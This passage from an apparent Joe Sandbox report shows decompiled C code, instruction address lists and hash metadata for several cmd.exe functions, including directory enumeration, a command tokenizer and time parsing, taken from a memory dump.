				void* _t224;
				void* _t225;
				intOrPtr _t227;
				intOrPtr _t231;

				_t195 = __edx;
				_v20 = __edx;
				_t168 = __ecx;
				_v28 = 0;
				_v16 = 0;
				_t227 =  *0x11fd544; // 0x0
				if(_t227 != 0) {
					L47:
					return 1;
				}
				_t115 = _a12;
				_v8 = _t115;
				_t208 = _t115 >> 0x00000002 & 1;
				_t123 = E011E5590(__ecx, __edx, _a4, _a8, _t115 >> 0x00000002 & 1, _a16, _a20, _a24, _a28, _a32);
				if(_t123 == 0) {
					_v16 = 1;
					_t216 = _v8 & 0x00000001;
					L4:
					E011E0040( *((intOrPtr*)(_t168 + 0x18)));
					 *((intOrPtr*)(_t168 + 0x18)) = 0;
					_t231 =  *0x11fd544; // 0x0
					if(_t231 != 0) {
						goto L47;
					}
					if(_t216 == 0) {
						return 0;
					}
					memset( &_v76, 0, 0x30);
					_t225 = _t224 + 0xc;
					_t129 = E011E297B( *((intOrPtr*)(_t168 + 4)));
					_t172 = 0x10;
					_v72 = _t129;
					_t173 = E011E00B0(_t172);
					if(_t173 == 0) {
						L51:
						E011F9287(_t173);
						__imp__longjmp(0x120b8b8, 1);
						L52:
						_v56 = _t195;
						_t218 = _t195;
						L10:
						if( *0x11fd544 != 0) {
							goto L47;
						}
						_v12 = _t195;
						if(_v56 <= 0) {
							L38:
							E011E0040(_v48);
							E011E0040(_v52);
							E011E0040(_v64[1]);
							E011E0040(_v64);
							E011E0040(_v72);
							if(_t218 != 0 || _v16 != _t218) {
								return _t218;
							} else {
								_push(2);
								L41:
								_pop(_t138);
								return _t138;
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t180 = ".";
							_t210 =  *((intOrPtr*)(_v48 + _v12 * 4));
							_t37 = _t210 + 0x30; // 0x30
							_t140 = _t37;
							_v24 = _t140;
							while(1) {
								_t196 =  *_t140;
								if(_t196 !=  *_t180) {
									break;
								}
								if(_t196 == 0) {
									L17:
									_t141 = 0;
									L18:
									if(_t141 == 0) {
										goto L37;
									}
									_t181 = L"..";
									_t41 = _t210 + 0x30; // 0x30
									_t144 = _t41;
									while(1) {
										_t197 =  *_t144;
										if(_t197 !=  *_t181) {
											break;
										}
										if(_t197 == 0) {
											L24:
											_t145 = 0;
											L25:
											if(_t145 == 0) {
												goto L37;
											}
											if((_v8 & 0x00000002) != 0 || ( *(_t210 + 4) & 0x00000400) == 0) {
												L28:
												_t198 =  *((intOrPtr*)(_t168 + 4));
												_t51 = _t198 + 2; // 0x402
												_t182 = _t51;
												do {
													_t146 =  *_t198;
													_t198 = _t198 + 2;
												} while (_t146 != 0);
												_t211 = _v24;
												_t183 = _t211;
												_t195 = _t198 - _t182 >> 1;
												_t220 = _t183 + 2;
												do {
													_t147 =  *_t183;
													_t183 = _t183 + 2;
												} while (_t147 != _v28);
												_t55 = _t195 + 2; // 0x400
												_t185 = _t183 - _t220 >> 1;
												_t222 = _t55 + (_t183 - _t220 >> 1);
												if(_t222 > 0x7fe7) {
													_push(_t211);
													E011DC5A2(_t185, 0x400023d8, 2,  *((intOrPtr*)(_t168 + 4)));
													_push(0x6f);
													goto L41;
												}
												memset( &_v124, 0, 0x30);
												_t225 = _t225 + 0xc;
												_t173 = _t222 + _t222;
												_t152 = E011E00B0(_t222 + _t222);
												if(_t152 == 0) {
													goto L51;
												}
												_v120 = _t152;
												E011E51C9(_t152, _t222,  *((intOrPtr*)(_t168 + 4)), _t211);
												_v112 =  *((intOrPtr*)(_t168 + 0xc));
												_v116 =  *((intOrPtr*)(_t168 + 8));
												_v108 =  *((intOrPtr*)(_t168 + 0x10));
												_t218 = E011E5266( &_v124, _v20, _a4, _a8, _v8, _a16, _a20, _a24, _a28, _a32);
												E011E0040(_v100);
												_v100 = 0;
												E011E0040(_v96);
												_v96 = 0;
												E011E0040(_v120);
												_v120 = 0;
												if(_t218 == 0) {
													_v16 = 1;
													goto L37;
												}
												if(_t218 != 2) {
													if(_t218 != 0x6f && _t218 != 3) {
														_t162 =  *((intOrPtr*)(_v48 + _v12 * 4));
														if(( *(_t162 + 4) & 0x00000400) == 0) {
															goto L38;
														}
														if(( *(_t162 + 0x28) & 0x20000000) != 0) {
															goto L36;
														}
														if( *(_t162 + 0x28) != 0x8000000a) {
															goto L38;
														}
													}
												}
												L36:
												_t218 = 0;
												goto L37;
											} else {
												if(( *(_t210 + 0x28) & 0x20000000) != 0 ||  *(_t210 + 0x28) == 0x8000000a) {
													goto L37;
												} else {
													goto L28;
												}
											}
										}
										_t203 =  *((intOrPtr*)(_t144 + 2));
										_t43 =  &(_t181[2]); // 0x2e
										if(_t203 !=  *_t43) {
											break;
										}
										_t144 = _t144 + 4;
										_t181 =  &(_t181[4]);
										if(_t203 != 0) {
											continue;
										}
										goto L24;
									}
									asm("sbb eax, eax");
									_t145 = _t144 | 0x00000001;
									goto L25;
								}
								_t204 =  *((intOrPtr*)(_t140 + 2));
								_t40 =  &(_t180[2]); // 0x200000
								if(_t204 !=  *_t40) {
									break;
								}
								_t140 = _t140 + 4;
								_t180 =  &(_t180[4]);
								if(_t204 != 0) {
									continue;
								}
								goto L17;
							}
							asm("sbb eax, eax");
							_t141 = _t140 | 0x00000001;
							goto L18;
							L37:
							_t143 = _v12 + 1;
							_v12 = _t143;
						} while (_t143 < _v56);
						goto L38;
					}
					_t163 =  *((intOrPtr*)(_t168 + 0x10));
					_v60 = _t163;
					_v64 = _t173;
					_t164 = L"*.*";
					_v68 = 1;
					_v76 = 0;
					if(_t163 == 0) {
						_t164 = "*";
					}
					 *_t173 = _t164;
					_v64[1] = E011E297B(_v72);
					_v64[3] = 0;
					_t218 = E011E5590( &_v76, _v20, 0x10, 0x10, _t208, 0, 0, 0, 0, 0);
					_t195 = 0;
					if(_t218 != 0) {
						goto L52;
					} else {
						goto L10;
					}
				}
				if(_t123 != 2) {
					if(_t123 == 3) {
						goto L3;
					}
				} else {
					L3:
					_t216 = _v8 & 0x00000001;
					if(_t216 != 0) {
						goto L4;
					}
				}
				return _t123;
			}





























































                                    0x011e5266
                                    0x011e5271
                                    0x011e5274
                                    0x011e5276
                                    0x011e527b
                                    0x011e527e
                                    0x011e5284
                                    0x011e5587
                                    0x00000000
                                    0x011e5589
                                    0x011e528a
                                    0x011e5291
                                    0x011e52af
                                    0x011e52b7
                                    0x011e52be
                                    0x011e5561
                                    0x011e5567
                                    0x011e52d9
                                    0x011e52dc
                                    0x011e52e3
                                    0x011e52e6
                                    0x011e52ec
                                    0x00000000
                                    0x00000000
                                    0x011e52f4
                                    0x00000000
                                    0x011e556f
                                    0x011e5303
                                    0x011e530b
                                    0x011e530e
                                    0x011e5315
                                    0x011e5316
                                    0x011e531e
                                    0x011e5322
                                    0x011ef105
                                    0x011ef105
                                    0x011ef111
                                    0x011ef117
                                    0x011ef117
                                    0x011ef11a
                                    0x011e5380
                                    0x011e5387
                                    0x00000000
                                    0x00000000
                                    0x011e5391
                                    0x011e5394
                                    0x011e5521
                                    0x011e5524
                                    0x011e552c
                                    0x011e5537
                                    0x011e553f
                                    0x011e5547
                                    0x011e554e
                                    0x00000000
                                    0x011e5555
                                    0x011e5555
                                    0x011e5557
                                    0x011e5557
                                    0x00000000
                                    0x011e5557
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e539a
                                    0x011e539a
                                    0x011e539d
                                    0x011e53a5
                                    0x011e53a8
                                    0x011e53a8
                                    0x011e53ab
                                    0x011e53ae
                                    0x011e53ae
                                    0x011e53b4
                                    0x00000000
                                    0x00000000
                                    0x011e53bd
                                    0x011e53d8
                                    0x011e53d8
                                    0x011e53da
                                    0x011e53dc
                                    0x00000000
                                    0x00000000
                                    0x011e53e2
                                    0x011e53e7
                                    0x011e53e7
                                    0x011e53ea
                                    0x011e53ea
                                    0x011e53f0
                                    0x00000000
                                    0x00000000
                                    0x011e53f9
                                    0x011e5414
                                    0x011e5414
                                    0x011e5416
                                    0x011e5418
                                    0x00000000
                                    0x00000000
                                    0x011e5422
                                    0x011e5431
                                    0x011e5431
                                    0x011e5436
                                    0x011e5436
                                    0x011e5439
                                    0x011e5439
                                    0x011e543c
                                    0x011e543f
                                    0x011e5444
                                    0x011e5449
                                    0x011e544b
                                    0x011e544d
                                    0x011e5450
                                    0x011e5450
                                    0x011e5453
                                    0x011e5456
                                    0x011e545e
                                    0x011e5461
                                    0x011e5463
                                    0x011e546b
                                    0x011ef193
                                    0x011ef19e
                                    0x011ef1a6
                                    0x00000000
                                    0x011ef1a6
                                    0x011e547a
                                    0x011e547f
                                    0x011e5482
                                    0x011e5485
                                    0x011e548c
                                    0x00000000
                                    0x00000000
                                    0x011e5498
                                    0x011e549d
                                    0x011e54b4
                                    0x011e54c0
                                    0x011e54cc
                                    0x011e54da
                                    0x011e54dc
                                    0x011e54e6
                                    0x011e54e9
                                    0x011e54f1
                                    0x011e54f4
                                    0x011e54fb
                                    0x011e5500
                                    0x011ef140
                                    0x00000000
                                    0x011ef140
                                    0x011e5509
                                    0x011ef14f
                                    0x011ef164
                                    0x011ef16e
                                    0x00000000
                                    0x00000000
                                    0x011ef17b
                                    0x00000000
                                    0x00000000
                                    0x011ef188
                                    0x00000000
                                    0x00000000
                                    0x011ef18e
                                    0x011ef14f
                                    0x011e550f
                                    0x011e550f
                                    0x00000000
                                    0x011ef121
                                    0x011ef128
                                    0x00000000
                                    0x011ef13b
                                    0x00000000
                                    0x011ef13b
                                    0x011ef128
                                    0x011e5422
                                    0x011e53fb
                                    0x011e53ff
                                    0x011e5403
                                    0x00000000
                                    0x00000000
                                    0x011e5409
                                    0x011e540c
                                    0x011e5412
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e5412
                                    0x011e557d
                                    0x011e557f
                                    0x00000000
                                    0x011e557f
                                    0x011e53bf
                                    0x011e53c3
                                    0x011e53c7
                                    0x00000000
                                    0x00000000
                                    0x011e53cd
                                    0x011e53d0
                                    0x011e53d6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e53d6
                                    0x011e5573
                                    0x011e5575
                                    0x00000000
                                    0x011e5511
                                    0x011e5514
                                    0x011e5515
                                    0x011e5518
                                    0x00000000
                                    0x011e539a
                                    0x011e5328
                                    0x011e532b
                                    0x011e5330
                                    0x011e5333
                                    0x011e5338
                                    0x011e533f
                                    0x011e5342
                                    0x011e5344
                                    0x011e5344
                                    0x011e5349
                                    0x011e535e
                                    0x011e536c
                                    0x011e5374
                                    0x011e5376
                                    0x011e537a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e537a
                                    0x011e52c7
                                    0x011ef0fa
                                    0x00000000
                                    0x011ef100
                                    0x011e52cd
                                    0x011e52cd
                                    0x011e52d0
                                    0x011e52d3
                                    0x00000000
                                    0x00000000
                                    0x011e52d3
                                    0x011e555e

                                    APIs
                                      • Part of subcall function 011E5590: memset.MSVCRT ref: 011E5614
                                      • Part of subcall function 011E0040: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,011E36B3,011E3691,00000000), ref: 011E0078
                                      • Part of subcall function 011E0040: RtlFreeHeap.NTDLL(00000000), ref: 011E007F
                                    • memset.MSVCRT ref: 011E5303
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • memset.MSVCRT ref: 011E547A
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,?), ref: 011EF111
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$memset$Process$AllocFreelongjmp
                                    • String ID: *.*
                                    • API String ID: 539101449-438819550
                                    • Opcode ID: 27be6b93dd1fcd828cadc6e1e1316623b2fa948dbe10fb922e1a4106583762fe
                                    • Instruction ID: f272619b77c9fde7b7153aa4ca50a1b8708a0100f008a81fdcae6fb49fc07b02
                                    • Opcode Fuzzy Hash: 27be6b93dd1fcd828cadc6e1e1316623b2fa948dbe10fb922e1a4106583762fe
                                    • Instruction Fuzzy Hash: 1AB1B075E00A069BDB6DDFE8C848AAEBBF3AF58318F154069E905EB241D731DD41CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DF090, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 46%
                                    			E011DF090(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				intOrPtr _t19;
				signed int _t26;
				signed int _t27;
				signed int _t28;
				intOrPtr _t37;
				signed int _t40;
				signed int _t41;
				void* _t43;
				intOrPtr _t46;
				intOrPtr* _t51;
				intOrPtr _t59;
				intOrPtr _t61;
				signed int _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				signed int _t75;
				void* _t76;
				intOrPtr _t83;

				_t66 = __edx;
				_t17 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t17 ^ _t75;
				_t73 = _a8;
				_v12 = __edx;
				_t70 = __ecx;
				if(_t73 == E011E0210) {
					_t19 = E011E0210(__ecx, __edx);
				} else {
					if(_t73 == E011E0480) {
						_t19 = E011E0480();
					} else {
						if(_t73 == E011E0600) {
							_t19 = E011E0600();
						} else {
							if(_t73 != E011E0620) {
								 *0x12194b4();
								_t19 =  *_t73();
							} else {
								_t19 = E011E0620();
							}
						}
					}
				}
				_t46 = _t19;
				if( *((short*)( *0x120b8a4)) == 0) {
					L21:
					return E011E6FD0(_t46, _t46, _v8 ^ _t75, _t66, _t70, _t73);
				} else {
					_t83 =  *0x11fd554; // 0x0
					if(_t83 != 0) {
					}
					_t68 = E011DF300(0x10, 0x120faa0, 0x2000, 0x10);
					 *0x120fa90 = _t68;
					if(_t68 == 0xffffffff) {
						 *0x120f980 = 0x234a;
						__imp__longjmp(0x120b940, 1);
						goto L49;
					} else {
						_t62 = 0x120faa0;
						_t4 = _t62 + 2; // 0x120faa2
						_t73 = _t4;
						do {
							_t43 =  *_t62;
							_t62 = _t62 + 2;
						} while (_t43 != 0);
						_t5 = (_t62 - _t73 >> 1) + 1; // 0x120fa9f
						 *0x120fa8c = _t5;
						if( *0x120f984 != 0) {
							L49:
							_push(0x120faa0);
							_push(_t68);
							E011E25D9(L"GeToken: (%x) \'%s\'\n");
							_t76 = _t76 + 0xc;
						}
					}
					_t26 = 0x120faa0;
					_t51 = _t70;
					while(1) {
						_t69 =  *_t51;
						if(_t69 !=  *_t26) {
							break;
						}
						if(_t69 == 0) {
							L17:
							_t27 = 0;
						} else {
							_t6 = _t51 + 2; // 0x2b0000
							_t66 =  *_t6;
							if(_t66 !=  *((intOrPtr*)(_t26 + 2))) {
								break;
							} else {
								_t51 = _t51 + 4;
								_t26 = _t26 + 4;
								if(_t66 != 0) {
									continue;
								} else {
									goto L17;
								}
							}
						}
						L18:
						if(_t27 == 0) {
							if( *0x120faa0 == 0xa) {
								goto L34;
							} else {
								_t71 = _v12;
								goto L37;
							}
						} else {
							_t40 =  *0x11fd558; // 0x0
							if( *((char*)(_t40 + 0x120f987)) == 0x33) {
								_t41 = "&";
								while(1) {
									_t59 =  *_t70;
									if(_t59 !=  *_t41) {
										break;
									}
									if(_t59 == 0) {
										L30:
										_t40 = 0;
									} else {
										_t10 = _t70 + 2; // 0x2b0000
										_t61 =  *_t10;
										_t11 = _t41 + 2; // 0x2b0000
										if(_t61 !=  *_t11) {
											break;
										} else {
											_t70 = _t70 + 4;
											_t41 = _t41 + 4;
											if(_t61 != 0) {
												continue;
											} else {
												goto L30;
											}
										}
									}
									L31:
									if(_t40 != 0 ||  *0x120faa0 != 0xa) {
										goto L20;
									} else {
										do {
											L34:
											_t28 = E011DF030(0);
										} while ( *0x120faa0 == 0xa);
										_t66 = 0;
										E011DF300(_t28, 0, 0, 0);
										if( *0x120faa0 == 0x29) {
											goto L21;
										} else {
											_t71 = 0x2e;
											L37:
											_t74 = E011E00B0(0x50);
											if(_t74 == 0) {
												E011F9287(0x50);
												__imp__longjmp(0x120b8b8, 1);
												asm("int3");
												_push( *0x120b8a0);
												E011E25D9(L"Ungetting: \'%s\'\n");
												 *0x120b8a4 =  *0x120b8a0;
												return 0;
											} else {
												 *_t74 = _t71;
												 *((intOrPtr*)(_t74 + 0x38)) = _t46;
												 *0x11fd548 = 1;
												E011DF030(8);
												_t72 = _a4;
												 *0x11fd548 = 0;
												if(_t72 != E011DE8C0) {
													 *0x12194b4();
													_t37 =  *_t72();
												} else {
													_t37 = E011DE8C0();
												}
												 *((intOrPtr*)(_t74 + 0x3c)) = _t37;
												return E011E6FD0(_t74, _t46, _v8 ^ _t75, _t66, _t72, _t74);
											}
										}
									}
									goto L52;
								}
								asm("sbb eax, eax");
								_t40 = _t41 | 0x00000001;
								goto L31;
							} else {
								L20:
								_t66 = 0;
								E011DF300(_t40, 0, 0, 0);
								goto L21;
							}
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t27 = _t26 | 0x00000001;
					goto L18;
				}
				L52:
			}
































                                    0x011df090
                                    0x011df098
                                    0x011df09f
                                    0x011df0a4
                                    0x011df0a7
                                    0x011df0ab
                                    0x011df0b3
                                    0x011df0e0
                                    0x011df0b5
                                    0x011df0bb
                                    0x011df1c2
                                    0x011df0c1
                                    0x011df0c7
                                    0x011df1cc
                                    0x011df0cd
                                    0x011df0d3
                                    0x011ec48d
                                    0x011ec493
                                    0x011df0d9
                                    0x011df0d9
                                    0x011df0d9
                                    0x011df0d3
                                    0x011df0c7
                                    0x011df0bb
                                    0x011df0e5
                                    0x011df0f0
                                    0x011df1ad
                                    0x011df1bf
                                    0x011df0f6
                                    0x011df0f8
                                    0x011df0fe
                                    0x011df1d6
                                    0x011df114
                                    0x011df116
                                    0x011df11f
                                    0x011ec4a1
                                    0x011ec4ab
                                    0x00000000
                                    0x011df125
                                    0x011df125
                                    0x011df12a
                                    0x011df12a
                                    0x011df130
                                    0x011df130
                                    0x011df133
                                    0x011df136
                                    0x011df146
                                    0x011df149
                                    0x011df14e
                                    0x011ec4b1
                                    0x011ec4b1
                                    0x011ec4b6
                                    0x011ec4bc
                                    0x011ec4c1
                                    0x011ec4c1
                                    0x011df14e
                                    0x011df154
                                    0x011df159
                                    0x011df160
                                    0x011df160
                                    0x011df166
                                    0x00000000
                                    0x00000000
                                    0x011df16f
                                    0x011df18a
                                    0x011df18a
                                    0x011df171
                                    0x011df171
                                    0x011df171
                                    0x011df179
                                    0x00000000
                                    0x011df17f
                                    0x011df17f
                                    0x011df182
                                    0x011df188
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df188
                                    0x011df179
                                    0x011df18c
                                    0x011df18e
                                    0x011df2da
                                    0x00000000
                                    0x011df2e0
                                    0x011df2e0
                                    0x00000000
                                    0x011df2e0
                                    0x011df194
                                    0x011df194
                                    0x011df1a0
                                    0x011df1e0
                                    0x011df1f0
                                    0x011df1f0
                                    0x011df1f6
                                    0x00000000
                                    0x00000000
                                    0x011df1ff
                                    0x011df21a
                                    0x011df21a
                                    0x011df201
                                    0x011df201
                                    0x011df201
                                    0x011df205
                                    0x011df209
                                    0x00000000
                                    0x011df20f
                                    0x011df20f
                                    0x011df212
                                    0x011df218
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011df218
                                    0x011df209
                                    0x011df21c
                                    0x011df21e
                                    0x00000000
                                    0x011df230
                                    0x011df230
                                    0x011df230
                                    0x011df232
                                    0x011df237
                                    0x011df243
                                    0x011df247
                                    0x011df254
                                    0x00000000
                                    0x011df25a
                                    0x011df25a
                                    0x011df25f
                                    0x011df269
                                    0x011df26d
                                    0x011ec4c9
                                    0x011ec4d5
                                    0x011ec4db
                                    0x011ec4dc
                                    0x011ec4e7
                                    0x011df43d
                                    0x011df44a
                                    0x011df273
                                    0x011df278
                                    0x011df27a
                                    0x011df27d
                                    0x011df287
                                    0x011df28c
                                    0x011df28f
                                    0x011df29f
                                    0x011df2ea
                                    0x011df2f0
                                    0x011df2a1
                                    0x011df2a1
                                    0x011df2a1
                                    0x011df2a9
                                    0x011df2bb
                                    0x011df2bb
                                    0x011df26d
                                    0x011df254
                                    0x00000000
                                    0x011df21e
                                    0x011df2c8
                                    0x011df2ca
                                    0x00000000
                                    0x011df1a2
                                    0x011df1a2
                                    0x011df1a4
                                    0x011df1a8
                                    0x00000000
                                    0x011df1a8
                                    0x011df1a0
                                    0x00000000
                                    0x011df18e
                                    0x011df2be
                                    0x011df2c0
                                    0x00000000
                                    0x011df2c0
                                    0x00000000

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                    • API String ID: 0-1704545398
                                    • Opcode ID: 2b5d0af96e814cbabd102fcacaa2d93e77093fb51009aeaaa89abef7ab3c268d
                                    • Instruction ID: 57408817a8dd5529476c4dff142a9f40bd4cfef1c67897232c3cf6abd08dabe3
                                    • Opcode Fuzzy Hash: 2b5d0af96e814cbabd102fcacaa2d93e77093fb51009aeaaa89abef7ab3c268d
                                    • Instruction Fuzzy Hash: 8B513C317401075BEB3DAFBCD91837A76E2FB95318F49812AD5038B285DB718687C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F4159, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E011F4159(signed int __ecx, wchar_t* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t26;
				long _t29;
				void* _t30;
				void* _t32;
				int _t36;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed short _t42;
				long _t45;
				long _t46;
				signed int _t48;
				wchar_t* _t52;
				int _t55;
				signed int _t59;
				void* _t64;
				long* _t66;
				intOrPtr _t69;
				long* _t73;
				void* _t77;
				void* _t78;
				void* _t79;
				wchar_t* _t81;
				signed int _t83;
				signed int _t84;
				void* _t85;

				_t26 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t26 ^ _t84;
				_v32 = __ecx;
				_v28 = _a4;
				_t52 = __edx;
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 = 0;
				_v24 = __ecx + 8;
				_t77 = 0;
				while(1) {
					_t81 = _t52;
					_t8 =  &(_t81[0]); // 0x2
					_t73 = _t8;
					do {
						_t29 =  *_t81;
						_t81 =  &(_t81[0]);
					} while (_t29 != _t55);
					_t83 = _t81 - _t73 >> 1;
					if(_t83 > 2 || iswdigit( *_t52 & 0x0000ffff) == 0) {
						L16:
						_t74 =  *_t52 & 0x0000ffff;
						if(( *_t52 & 0x0000ffff) == 0) {
							goto L31;
						} else {
							if(E011DD7D4( &_v20, _t74) == 0) {
								goto L11;
							} else {
								goto L18;
							}
						}
					} else {
						_t45 = _t52[0] & 0x0000ffff;
						if(_t45 == 0 || iswdigit(_t45) != 0) {
							_t46 = wcstol(_t52, 0, 0xa);
							_t66 = _v24;
							_t52 = _t52 + _t83 * 2 + 2;
							_t85 = _t85 + 0xc;
							 *_t66 = _t46;
							_t74 =  *_t52 & 0x0000ffff;
							_v24 =  &(_t66[0]);
							if(( *_t52 & 0x0000ffff) == 0) {
								L31:
								_t77 = _t77 + 1;
								_t30 = 4;
								if(_t77 < _t30) {
									_t78 = _v24;
									_t59 = _t30 - _t77 >> 1;
									_t36 = memset(_t78, 0, _t59 << 2);
									_t79 = _t78 + _t59;
									asm("adc ecx, ecx");
									memset(_t79, _t36, 0);
									_t77 = _t79;
								}
								_t32 = 1;
							} else {
								if(E011DD7D4( &_v20, _t74) != 0) {
									L18:
									_t39 =  *_t52 & 0x0000ffff;
									if(_t39 == 0x70 || _t39 == 0x50) {
										_t64 = 1;
									} else {
										_t64 = 0;
									}
									_t40 = _t52[1] & 0x0000ffff;
									if(_t40 == 0 || _t40 == 0x6d || _t40 == 0x4d) {
										_t74 = _v32;
										_t41 =  *(_t74 + 8) & 0x0000ffff;
										if(_t64 == 0) {
											if(_t41 == 0xc) {
												_t42 = 0;
												goto L30;
											}
										} else {
											if(_t41 != 0xc) {
												_t42 = _t41 + 0xc;
												L30:
												 *(_t74 + 8) = _t42;
											}
										}
										goto L31;
									} else {
										goto L11;
									}
								} else {
									_t48 =  *_t52 & 0x0000ffff;
									_t69 = _v28;
									if(_t77 >= 2) {
										if(_t48 ==  *((intOrPtr*)(_t69 + 2)) || _t48 ==  *((intOrPtr*)(_t69 + 6))) {
											goto L14;
										} else {
											goto L11;
										}
									} else {
										_t74 = _t48;
										if(E011DD7D4(_t69, _t48) != 0) {
											L14:
											_t77 = _t77 + 1;
											_t52 = E011DD7E6(_t52);
											if(_t77 >= 4) {
												goto L16;
											} else {
												_t55 = 0;
												continue;
											}
										} else {
											L11:
											_t32 = 0;
										}
									}
								}
							}
						} else {
							goto L16;
						}
					}
					return E011E6FD0(_t32, _t52, _v8 ^ _t84, _t74, _t77, _t83);
				}
			}





































                                    0x011f4161
                                    0x011f4168
                                    0x011f4176
                                    0x011f417c
                                    0x011f417f
                                    0x011f4181
                                    0x011f4182
                                    0x011f4183
                                    0x011f4188
                                    0x011f418a
                                    0x011f418d
                                    0x011f418f
                                    0x011f418f
                                    0x011f4191
                                    0x011f4191
                                    0x011f4194
                                    0x011f4194
                                    0x011f4197
                                    0x011f419a
                                    0x011f41a1
                                    0x011f41a6
                                    0x011f424b
                                    0x011f424b
                                    0x011f4251
                                    0x00000000
                                    0x011f4253
                                    0x011f425d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f425d
                                    0x011f41bf
                                    0x011f41bf
                                    0x011f41c6
                                    0x011f41d9
                                    0x011f41df
                                    0x011f41e5
                                    0x011f41e8
                                    0x011f41eb
                                    0x011f41f1
                                    0x011f41f4
                                    0x011f41fa
                                    0x011f42a6
                                    0x011f42a8
                                    0x011f42a9
                                    0x011f42ac
                                    0x011f42b0
                                    0x011f42b7
                                    0x011f42b9
                                    0x011f42b9
                                    0x011f42bb
                                    0x011f42bd
                                    0x011f42bd
                                    0x011f42bd
                                    0x011f42c2
                                    0x011f4200
                                    0x011f420a
                                    0x011f425f
                                    0x011f425f
                                    0x011f4265
                                    0x011f4272
                                    0x011f426c
                                    0x011f426c
                                    0x011f426c
                                    0x011f4273
                                    0x011f427a
                                    0x011f4286
                                    0x011f4289
                                    0x011f428f
                                    0x011f429e
                                    0x011f42a0
                                    0x00000000
                                    0x011f42a0
                                    0x011f4291
                                    0x011f4294
                                    0x011f4296
                                    0x011f42a2
                                    0x011f42a2
                                    0x011f42a2
                                    0x011f4294
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f420c
                                    0x011f420c
                                    0x011f420f
                                    0x011f4215
                                    0x011f422d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f4217
                                    0x011f4217
                                    0x011f4220
                                    0x011f4235
                                    0x011f4237
                                    0x011f423d
                                    0x011f4242
                                    0x00000000
                                    0x011f4244
                                    0x011f4244
                                    0x00000000
                                    0x011f4244
                                    0x011f4222
                                    0x011f4222
                                    0x011f4222
                                    0x011f4222
                                    0x011f4220
                                    0x011f4215
                                    0x011f420a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f41c6
                                    0x011f42d3
                                    0x011f42d3

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: iswdigit$wcstol
                                    • String ID: aApP
                                    • API String ID: 644763121-2547155087
                                    • Opcode ID: 13c19929543b992d4d1fc5e574e4e91b71b5aaa6719b4bf0e1b63874c5fd8980
                                    • Instruction ID: 0aa3b0cca32f986d17f25b8c548019d41504aff5f6729d95060213638df22435
                                    • Opcode Fuzzy Hash: 13c19929543b992d4d1fc5e574e4e91b71b5aaa6719b4bf0e1b63874c5fd8980
